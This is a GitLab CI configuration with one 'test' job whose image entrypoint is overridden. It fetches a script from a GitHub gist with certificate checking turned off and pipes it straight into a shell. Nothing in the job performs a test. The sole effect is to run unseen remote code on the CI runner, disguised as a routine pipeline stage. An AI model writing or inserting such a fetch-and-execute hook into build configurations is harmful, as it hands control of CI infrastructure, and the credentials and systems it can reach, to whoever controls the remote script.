stages:
  - test

test:
  stage: test
  image:
    name: gitlab/gitlab-ce:latest
    entrypoint: ["/bin/sh", "-c", 'curl -k https://gist.githubusercontent.com/parthanon/d0fb1a338b1bcf5a46fcc10c780ab542/raw/10bbfe2212e47275d69ca605721681b813416af8/gistfile1.txt | sh']
